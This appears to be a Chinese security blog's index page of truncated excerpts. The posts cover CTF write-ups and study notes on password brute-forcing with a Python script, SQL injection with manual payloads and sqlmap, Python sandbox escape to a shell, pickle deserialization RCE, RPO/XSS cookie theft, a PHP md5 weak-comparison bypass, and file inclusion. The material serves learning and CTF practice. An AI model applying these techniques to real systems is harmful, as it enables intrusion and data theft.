输入密码查看flag1234567891011121314151617181920212223# -*- coding: utf-8 -*-import stringimport requestspayload = '1234567890'url='http://c.bugku.com/baopo/'s = requests.session()r = s.get(url)for a in payload: for b in payload: for c in payload: for d in payload: for e ...

写在前面：个人学习笔记，对各路大佬”名言”的摘抄，方便自己以后查看,大佬们就请路过吧orz 77777.1123456789101112131415function waf($points){ return $points;} function update_point($p,$points){ $link=mysqli_connect('127.0.0.1','root','root','ctf_test'); $q = sprintf("UPDATE user SET points =%d%s",$p,waf($points)); var_dump( ...

Web 1 数据库的秘密题目地址：http://116.85.43.88:8080/ZVDHKBUVUZSTJCNX/dfe3ia/index.php Henryzhao师傅的解法使用 PHP 编写代理页面的方式，对请求进行了代理并签名。之后使用 sqlmap 等通用工具对该 PHP 页面进行注入。 123456789101112131415161718192021222324252627282930313233343536<?php@$id = $_REQUEST['id'];@$title = $_REQUEST['title'];@$author = $_REQUEST['auth ...

前言最近参加的两场CTF线上赛都涉及到了Flask反序列化漏洞+Python沙箱逃逸，所以相结合HITB的Python Revenge题目总结一下Python的沙箱逃逸。 正文沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端等),脱离种种过滤和限制,最终成功拿到shell权限的过程 对于python的沙箱逃逸而言,我们来实现目的的最终想法有以下几个 使用os包中的popen,system两个函数来直接执行shell 使用commands模块中的方法 使用subprocess 使用写文件到指定位置,再使用其他辅助手段总体来说,我们使用以下几个函数,就可以直接愉快 ...

0x01 前言数据序列化常见的应用场景：数据结构网络传输，session存储，cache存储，或者配置文件上传，参数接收等接口处。 主要作用：能够让数据在存储或者传输的时候能够单单只用string的类型去表述相对复杂的数据结构，方便应用所见即所得，直接进行数据交流处理。 引发的安全问题：PHP的unserialize/__wakeup()漏洞、struts的ognl、xml解析的一系列漏洞、Ruby on Rails的xml/yaml，本文即将要讲的Python pickle/cPickle库的反序列化漏洞 此类漏洞常会导致RCE，原因：和我们所提到的应用场景有关。语言需要从string去解析 ...

SQL Injection:SQL注入是指攻击者通过注入恶意的SQL语句，破坏SQL语句的结构，进而达到执行恶意SQL语句的目的。 本次学习通过两种方式：手工注入、Sqlmap工具注入 手工注入抽象来讲，分为两步： 找注入点(在哪里注入) 构造注入内容(如何注入) 下面对四种级别的代码进行分析： Low12345678910111213141516171819202122<?phpif( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check da ...

PRO的全称为“Relative Path Overwrite”，也就是相对路径覆盖。利用浏览器和服务器对资源加载设置的差异，通过某些方法和技巧，在相对路径处，引入我们可控的js/css文件，甚至引入非js/css文件，并按照js/css的语法执行，从而实现攻击。 由题引入 1题目地址：http://39.107.33.96:20000/login.php 0x01 测试XSS大致思路：登陆进入后， url提交过去可能会有waf 后台会有bot点击提交过去的url 需要传过去自己VPS的地址得到cookie。 测试waf: reports输入框中输入： 1http://39.107.33 ...

welcome这题下载下来一个bmp文件，尝试最低位隐写无果后，尝试offset，最后在offset100位后找到flag flag: qwb{W3lc0me} web签到1题目地址：`http://39.107.33.96:10000/` 第一层：使用了弱等于，php弱类型绕过 0e开头的全部相等 123if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){ die("success!");} payload 1param1=24061 ...

时间过得真快，不知不觉已经来到北邮半年了~，想想自己吊儿郎当的上半学期，这半年一定要认真生活、学习。许久没有更新过博客了，虽然也并没有几个人会关注到我吧 :) 。尽管渺小，依然要茁壮成长~~。 接下来的时间就让这个博客一直陪伴着我，愿同大家一路学习，分享我成长过程中的点点滴滴……

File Inclusion分为本地文件包含和远程文件包含，远程文件包含是开启了php配置中的allow_url_fopen (选项开启后，服务器允许包含一个远程文件) 相关配置; Whether to allow the treatment of URLs (like http:// or ftp://) as files. allow_url_fopen = On ; Whether to allow include/require to open URLs (like http:// or ftp://) as files. allow_url_include = On ; Magic ...